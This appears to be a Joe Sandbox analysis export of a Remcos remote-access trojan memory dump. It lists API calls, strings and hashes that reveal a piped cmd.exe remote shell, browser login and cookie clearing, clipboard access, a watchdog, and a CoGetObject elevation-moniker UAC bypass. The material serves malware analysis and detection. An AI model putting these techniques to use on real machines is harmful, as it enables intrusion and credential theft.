                                      • Opcode Fuzzy Hash: b8eeb05da265f8865f57396f22fa8586bf58ff7c7cd7cdd6c08fab0b7b088d86
                                      • Instruction Fuzzy Hash: 7CF0E971E8052867DB316B229C44F5BB759AFD2770BE48111EE049A080EF30D80386F0

                                      Control-flow Graph

                                      control_flow_graph 552 2a46137-2a46143 553 2a46175-2a46180 call 2a405dd 552->553 554 2a46145-2a46147 552->554 561 2a46182-2a46184 553->561 556 2a46160-2a46171 RtlAllocateHeap 554->556 557 2a46149-2a4614a 554->557 559 2a46173 556->559 560 2a4614c-2a46153 call 2a45545 556->560 557->556 559->561 560->553 564 2a46155-2a4615e call 2a42f80 560->564 564->553 564->556
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,02A352BC,?,?,02A38847,?,?,00000000,02A76B50,?,02A0DE62,02A352BC,?,?,?,?), ref: 02A46169
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 6ca8579889aa35e4cfde6498d9e61523961ea03eb1496758923dd68c1fa0bc60
                                      • Instruction ID: 472f51b3502c2dd68fb28c8831989f9a2d18aff9a7f4ce4f71fa557882c2e31f
                                      • Opcode Fuzzy Hash: 6ca8579889aa35e4cfde6498d9e61523961ea03eb1496758923dd68c1fa0bc60
                                      • Instruction Fuzzy Hash: 2BE09231D8022577EB22276D9D44B9B776E9FC3BB2F554221ED1697082DF20C80985F5
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 02A056E6
                                        • Part of subcall function 02A04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02A04B36
                                      • __Init_thread_footer.LIBCMT ref: 02A05723
                                      • CreatePipe.KERNEL32(02A76CCC,02A76CB4,02A76BD8,00000000,02A660BC,00000000), ref: 02A057B6
                                      • CreatePipe.KERNEL32(02A76CB8,02A76CD4,02A76BD8,00000000), ref: 02A057CC
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,02A76BE8,02A76CBC), ref: 02A0583F
                                      • Sleep.KERNEL32(0000012C,00000093,?), ref: 02A05897
                                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02A058BC
                                      • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 02A058E9
                                        • Part of subcall function 02A34770: __onexit.LIBCMT ref: 02A34776
                                      • WriteFile.KERNEL32(00000000,00000000,?,00000000,02A74F90,02A660C0,00000062,02A660A4), ref: 02A059E4
                                      • Sleep.KERNEL32(00000064,00000062,02A660A4), ref: 02A059FE
                                      • TerminateProcess.KERNEL32(00000000), ref: 02A05A17
                                      • CloseHandle.KERNEL32 ref: 02A05A23
                                      • CloseHandle.KERNEL32 ref: 02A05A2B
                                      • CloseHandle.KERNEL32 ref: 02A05A3D
                                      • CloseHandle.KERNEL32 ref: 02A05A45
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                      • String ID: SystemDrive$cmd.exe
                                      • API String ID: 2994406822-3633465311
                                      • Opcode ID: 508e5f61704a8bddeaae3dc37399644e36f61ac3b898d62701700f42e79cf3b0
                                      • Instruction ID: f8520cde1798ca2ee8e5e09867860abab1ae790ec553cb2f02cde3169bd9c9fe
                                      • Opcode Fuzzy Hash: 508e5f61704a8bddeaae3dc37399644e36f61ac3b898d62701700f42e79cf3b0
                                      • Instruction Fuzzy Hash: 90919171EC4304AFE610AB25BEC4B2F7BAEFB44B40F400829F94696191DF259C198F69
                                      APIs
                                      • GetCurrentProcessId.KERNEL32 ref: 02A12106
                                        • Part of subcall function 02A13877: RegCreateKeyA.ADVAPI32(80000001,00000000,02A660A4), ref: 02A13885
                                        • Part of subcall function 02A13877: RegSetValueExA.ADVAPI32(02A660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,02A0C152,02A66C48,00000001,000000AF,02A660A4), ref: 02A138A0
                                        • Part of subcall function 02A13877: RegCloseKey.ADVAPI32(02A660A4,?,?,?,02A0C152,02A66C48,00000001,000000AF,02A660A4), ref: 02A138AB
                                      • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 02A12146
                                      • CloseHandle.KERNEL32(00000000), ref: 02A12155
                                      • CreateThread.KERNEL32(00000000,00000000,02A127EE,00000000,00000000,00000000), ref: 02A121AB
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 02A1241A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                      • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                      • API String ID: 3018269243-13974260
                                      • Opcode ID: 57deb12010830b22654116ca1b63f89924b2b51f2240ee765c326f4e7b08f6d3
                                      • Instruction ID: 04ff04c9aa18a2d367d23b4830c6284157f5a6370153a3446e83dfd588864243
                                      • Opcode Fuzzy Hash: 57deb12010830b22654116ca1b63f89924b2b51f2240ee765c326f4e7b08f6d3
                                      • Instruction Fuzzy Hash: 8C7182315843106BD614FB70EE999BFB3A6BF95724F40096FB886560D0EF609D09CEA2
                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 02A0BBAF
                                      • FindClose.KERNEL32(00000000), ref: 02A0BBC9
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 02A0BCEC
                                      • FindClose.KERNEL32(00000000), ref: 02A0BD12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$CloseFile$FirstNext
                                      • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                      • API String ID: 1164774033-3681987949
                                      • Opcode ID: 4a18284e0e423d234c65972c90b4493933734831839a216e627c5cb7938f32fc
                                      • Instruction ID: 79a69d9426e1549e8fa435f0ad0acf6efdad9a8faeeb4388ad72cf0369312e03
                                      • Opcode Fuzzy Hash: 4a18284e0e423d234c65972c90b4493933734831839a216e627c5cb7938f32fc
                                      • Instruction Fuzzy Hash: 195165319802199BDB14F7B0EED9DFEB73AAF14714F40095BE406661D0EF345A8ACE91
                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 02A0BDAF
                                      • FindClose.KERNEL32(00000000), ref: 02A0BDC9
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 02A0BE89
                                      • FindClose.KERNEL32(00000000), ref: 02A0BEAF
                                      • FindClose.KERNEL32(00000000), ref: 02A0BED0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$Close$File$FirstNext
                                      • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                      • API String ID: 3527384056-432212279
                                      • Opcode ID: 2761ed202f5dcbe3b4aaac5e966117543067a0fe0ec7ddcff4de8d9ef7f95ab6
                                      • Instruction ID: 1a51c5990bfbaa05e5894d9922a72f6b7ab60af7fe2a78554cc5eefe8dae70c6
                                      • Opcode Fuzzy Hash: 2761ed202f5dcbe3b4aaac5e966117543067a0fe0ec7ddcff4de8d9ef7f95ab6
                                      • Instruction Fuzzy Hash: 9041A431980219AAEB04F7B4FED9DFEB77EAF15714F400916E506A60C0EF245A46CE91
                                      APIs
                                      • OpenClipboard.USER32 ref: 02A168C2
                                      • EmptyClipboard.USER32 ref: 02A168D0
                                      • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 02A168F0
                                      • GlobalLock.KERNEL32(00000000), ref: 02A168F9
                                      • GlobalUnlock.KERNEL32(00000000), ref: 02A1692F
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 02A16938
                                      • CloseClipboard.USER32 ref: 02A16955
                                      • OpenClipboard.USER32 ref: 02A1695C
                                      • GetClipboardData.USER32(0000000D), ref: 02A1696C
                                      • GlobalLock.KERNEL32(00000000), ref: 02A16975
                                      • GlobalUnlock.KERNEL32(00000000), ref: 02A1697E
                                      • CloseClipboard.USER32 ref: 02A16984
                                        • Part of subcall function 02A04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02A04B36
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                      • String ID:
                                      • API String ID: 3520204547-0
                                      • Opcode ID: 5c3dd18016b126dbee4dffa6a26a757c94f909479782b6e158a94a28f11011ac
                                      • Instruction ID: 1c0792734d42827913c8071cb0b3ebe22a9914c2bffddfb5f80c232211848709
                                      • Opcode Fuzzy Hash: 5c3dd18016b126dbee4dffa6a26a757c94f909479782b6e158a94a28f11011ac
                                      • Instruction Fuzzy Hash: D4213171A84311DBC714BBB1ED9CABF76AAAF84751F400C5DF506861C0EF24C919CAA2
                                      APIs
                                      • _wcslen.LIBCMT ref: 02A07521
                                      • CoGetObject.OLE32(?,00000024,02A66518,00000000), ref: 02A07582
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Object_wcslen
                                      • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                      • API String ID: 240030777-3166923314
                                      • Opcode ID: e47921b029c548ead712da6c9fa29f7c55650d66b4b9f387fadfc8db56a2eb32
                                      • Instruction ID: 53825468eb050b3d4446e11f1e6d10bd4d6900f8aa6459ec8606b103097aac33
                                      • Opcode Fuzzy Hash: e47921b029c548ead712da6c9fa29f7c55650d66b4b9f387fadfc8db56a2eb32
                                      • Instruction Fuzzy Hash: 55118A71950214BBE711E7949D89AEEF77CEB08B10F140095F515A3140EF74AA04CAB5
                                      APIs
                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,02A758E8), ref: 02A1A75E
                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 02A1A7AD
                                      • GetLastError.KERNEL32 ref: 02A1A7BB
                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 02A1A7F3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                      • String ID:
                                      • API String ID: 3587775597-0
                                      • Opcode ID: bffdc3cba92217415fdae7a739cd187d6876af999e37f26ab76c4e253cc35ade
                                      • Instruction ID: f0732a5e50d3aabafcc426bacbe0cbce616c83f20937869372708f74947faded
                                      • Opcode Fuzzy Hash: bffdc3cba92217415fdae7a739cd187d6876af999e37f26ab76c4e253cc35ade
                                      • Instruction Fuzzy Hash: CE815D31548304ABC705EB60E9D4DAFB7AABF98354F50091EF58686190EF70EE09CF92
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 02A0C39B
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 02A0C46E
                                      • FindClose.KERNEL32(00000000), ref: 02A0C47D
                                      • FindClose.KERNEL32(00000000), ref: 02A0C4A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$CloseFile$FirstNext
                                      • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                      • API String ID: 1164774033-405221262
                                      • Opcode ID: 002e10df7f396e404ab188cd57acceede5b74e65ad0177e15a5dfc7fe09c26bf
                                      • Instruction ID: 5e6fabedb396410cd500b855b87583a999b37af608beb16675177510c08eacd9
                                      • Opcode Fuzzy Hash: 002e10df7f396e404ab188cd57acceede5b74e65ad0177e15a5dfc7fe09c26bf
                                      • Instruction Fuzzy Hash: 84318431980219AADB15F7A0FDD8DFEB77EBF14B10F00015BA10AA20C0EF749A4ACE45
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,02A74EE0,?), ref: 02A1C2EC
                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,02A74EE0,?), ref: 02A1C31C
                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,02A74EE0,?), ref: 02A1C38E
                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,02A74EE0,?), ref: 02A1C39B
                                        • Part of subcall function 02A1C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,02A74EE0,?), ref: 02A1C371
                                      • GetLastError.KERNEL32(?,?,?,?,?,02A74EE0,?), ref: 02A1C3BC
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,02A74EE0,?), ref: 02A1C3D2
                                      • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,02A74EE0,?), ref: 02A1C3D9
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,02A74EE0,?), ref: 02A1C3E2
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                      • String ID:
                                      • API String ID: 2341273852-0
                                      • Opcode ID: e8589ad3b83d67eb997c06d488bb886ff475d5139de4a2a38a54f2702e4c625c
                                      • Instruction ID: 8ec3e2ac113362d7dac72acd2236ccdd1246927ab32186be55ba25490c4e93a2
                                      • Opcode Fuzzy Hash: e8589ad3b83d67eb997c06d488bb886ff475d5139de4a2a38a54f2702e4c625c
                                      • Instruction Fuzzy Hash: 84319F72C80329AADB24E7A0DD88EDFF37EAB04320F5405E6E545D2040EF35D6858FA5
                                      APIs
                                      • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02A1409D
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02A140A9
                                        • Part of subcall function 02A04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02A04B36
                                      • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 02A1426A
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A14271
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressCloseCreateLibraryLoadProcsend
                                      • String ID: SHDeleteKeyW$Shlwapi.dll
                                      • API String ID: 2127411465-314212984
                                      • Opcode ID: 2d4ca199c5c8ca6aa52892a58815b503d0f7fb631ae5020734228be93866ac7a
                                      • Instruction ID: 932915b8e9b66547a10c1129fa7359bd35884f2dc0380ae0f17c08a428a1565e
                                      • Opcode Fuzzy Hash: 2d4ca199c5c8ca6aa52892a58815b503d0f7fb631ae5020734228be93866ac7a
                                      • Instruction Fuzzy Hash: 32B10871AC430067DA14FB78EED9DBF76ABAF95750F80091DF846971D0EE608908CE92
                                      APIs
                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 02A0BA4E
                                      • GetLastError.KERNEL32 ref: 02A0BA58
                                      Strings
                                      • UserProfile, xrefs: 02A0BA1E
                                      • [Chrome StoredLogins found, cleared!], xrefs: 02A0BA7E
                                      • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 02A0BA19
                                      • [Chrome StoredLogins not found], xrefs: 02A0BA72
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteErrorFileLast
                                      • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                      • API String ID: 2018770650-1062637481
                                      • Opcode ID: faee76d8fc8aa529d19555b08383527ece08eeec7821fb51e47726c937e49741
                                      • Instruction ID: 7e0d97889d98e55fd46137146e47fc24c1386ebecd8f0a22e56404d29bcc0c45
                                      • Opcode Fuzzy Hash: faee76d8fc8aa529d19555b08383527ece08eeec7821fb51e47726c937e49741
                                      • Instruction Fuzzy Hash: 5B01D672AC02056B5B087B76FFDAEFE772AA911B04B400A16E803625D0EE159915CEE2
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 02A1795F
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 02A17966
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02A17978
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02A17997
                                      • GetLastError.KERNEL32 ref: 02A1799D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                      • String ID: SeShutdownPrivilege
                                      • API String ID: 3534403312-3733053543
                                      • Opcode ID: 3fd4fc73d3467ed659b34cbb8c75c89f052756d417f2e39bc38de0c4fc6c04a1
                                      • Instruction ID: af875b38519e2424f47d25b8dd6407a782c67cf2595f3ec104189e835cb628b7
                                      • Opcode Fuzzy Hash: 3fd4fc73d3467ed659b34cbb8c75c89f052756d417f2e39bc38de0c4fc6c04a1
                                      • Instruction Fuzzy Hash: 03F0177184122AEBEB109BA0EC4DAEFBFBCEF05311F100851B809A5040DA348A15CAE1
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 02A09258
                                        • Part of subcall function 02A048C8: connect.WS2_32(?,?,?), ref: 02A048E0
                                        • Part of subcall function 02A04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02A04B36
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02A092F4
                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 02A09352
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 02A093AA
                                      • FindClose.KERNEL32(00000000), ref: 02A093C1
                                        • Part of subcall function 02A04E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,02A74EF8,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04E38
                                        • Part of subcall function 02A04E26: SetEvent.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04E43
                                        • Part of subcall function 02A04E26: CloseHandle.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04E4C
                                      • FindClose.KERNEL32(00000000), ref: 02A095B9
                                        • Part of subcall function 02A04AA1: WaitForSingleObject.KERNEL32(?,00000000,02A01A45,?,?,00000004,?,?,00000004,02A76B50,02A74EE0,00000000), ref: 02A04B47
                                        • Part of subcall function 02A04AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,02A76B50,02A74EE0,00000000,?,?,?,?,?,02A01A45), ref: 02A04B75
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                      • String ID:
                                      • API String ID: 1824512719-0
                                      • Opcode ID: 1bfbf9409d4c4e96ab103f43b02622d37ff5cb766bd08119424256a9fd91def8
                                      • Instruction ID: bcf59c3d1a2f4333ac9a2579dfc8c639b1924f152525faf38efd84c1b5e82da9
                                      • Opcode Fuzzy Hash: 1bfbf9409d4c4e96ab103f43b02622d37ff5cb766bd08119424256a9fd91def8
                                      • Instruction Fuzzy Hash: D1B15032940219ABDB15EBA0EED5EEEB77AAF04710F10415AE50AA70D1EF705E49CF90
                                      APIs
                                        • Part of subcall function 02A17952: GetCurrentProcess.KERNEL32(00000028,?), ref: 02A1795F
                                        • Part of subcall function 02A17952: OpenProcessToken.ADVAPI32(00000000), ref: 02A17966
                                        • Part of subcall function 02A17952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02A17978
                                        • Part of subcall function 02A17952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02A17997
                                        • Part of subcall function 02A17952: GetLastError.KERNEL32 ref: 02A1799D
                                      • ExitWindowsEx.USER32(00000000,00000001), ref: 02A16856
                                      • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 02A1686B
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A16872
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                      • String ID: PowrProf.dll$SetSuspendState
                                      • API String ID: 1589313981-1420736420
                                      • Opcode ID: 023184f6606e87da5a913337590d04c21225bfc756adfa486fdadeccc1bc433a
                                      • Instruction ID: c261a76e363e621bad9356b013228c421430e807d5aaa688d7f320f555c4bc4b
                                      • Opcode Fuzzy Hash: 023184f6606e87da5a913337590d04c21225bfc756adfa486fdadeccc1bc433a
                                      • Instruction Fuzzy Hash: B7217370A8430197DE14FBB4A9D89BF635F9F41794F804C19A146971C1EF649809CF61
                                      APIs
                                        • Part of subcall function 02A13549: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 02A13569
                                        • Part of subcall function 02A13549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 02A13587
                                        • Part of subcall function 02A13549: RegCloseKey.ADVAPI32(00000000), ref: 02A13592
                                      • Sleep.KERNEL32(00000BB8), ref: 02A0F85B
                                      • ExitProcess.KERNEL32 ref: 02A0F8CA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseExitOpenProcessQuerySleepValue
                                      • String ID: 4.9.4 Pro$override$pth_unenc
                                      • API String ID: 2281282204-930821335
                                      • Opcode ID: 3345beefd06165678e34bb941fe445b3b4f8c721b35984f38e3e70718b5e3ca1
                                      • Instruction ID: 7c6b4e3532286e68fe21b9b31b82747417ea7c36fab10be96e222756023c3d73
                                      • Opcode Fuzzy Hash: 3345beefd06165678e34bb941fe445b3b4f8c721b35984f38e3e70718b5e3ca1
                                      • Instruction Fuzzy Hash: 87212961FD0301A7E9047B795EDEABF766B9B80B20F800019E40A976C5EF648D018FE7
                                      APIs
                                      • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 02A524D5
                                      • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 02A524FE
                                      • GetACP.KERNEL32 ref: 02A52513
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID: ACP$OCP
                                      • API String ID: 2299586839-711371036
                                      • Opcode ID: a24953eea3feace8d89db8a9fd9caf9b398d9d6fa3e501d45bae550ef852484c
                                      • Instruction ID: a777407cf20fcdc0cc1cc7fbc6c8b9951338686253902a7523f6f6baf066403c
                                      • Opcode Fuzzy Hash: a24953eea3feace8d89db8a9fd9caf9b398d9d6fa3e501d45bae550ef852484c
                                      • Instruction Fuzzy Hash: AA21A732A40125E7EB34CF54D994BEB77B6EF44B68B4A8564ED0ADB200EF32D941C790
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 02A0966A
                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 02A096E2
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 02A0970B
                                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 02A09722
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstH_prologNext
                                      • String ID:
                                      • API String ID: 1157919129-0
                                      • Opcode ID: 11e5a533645298e3a48bd5a91dfaa492612b82fafb7fc590ddb5c444c7514e2b
                                      • Instruction ID: f43f65022b713ad7d422ed74ae948933023b093607c1d6b2a91ec77887c292a4
                                      • Opcode Fuzzy Hash: 11e5a533645298e3a48bd5a91dfaa492612b82fafb7fc590ddb5c444c7514e2b
                                      • Instruction Fuzzy Hash: 62811A329401199BDB15EBA0EED49EEB37ABF14354F10456AE50AA70D1EF30AE49CF90
                                      APIs
                                        • Part of subcall function 02A48215: GetLastError.KERNEL32(?,02A3F720,02A3A7F5,02A3F720,02A74EF8,?,02A3CE15,FF8BC35D,02A74EF8,02A74EF8), ref: 02A48219
                                        • Part of subcall function 02A48215: _free.LIBCMT ref: 02A4824C
                                        • Part of subcall function 02A48215: SetLastError.KERNEL32(00000000,FF8BC35D,02A74EF8,02A74EF8), ref: 02A4828D
                                        • Part of subcall function 02A48215: _abort.LIBCMT ref: 02A48293
                                        • Part of subcall function 02A48215: _free.LIBCMT ref: 02A48274
                                        • Part of subcall function 02A48215: SetLastError.KERNEL32(00000000,FF8BC35D,02A74EF8,02A74EF8), ref: 02A48281
                                      • GetUserDefaultLCID.KERNEL32 ref: 02A5271C
                                      • IsValidCodePage.KERNEL32(00000000), ref: 02A52777
                                      • IsValidLocale.KERNEL32(?,00000001), ref: 02A52786
                                      • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 02A527CE
                                      • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 02A527ED
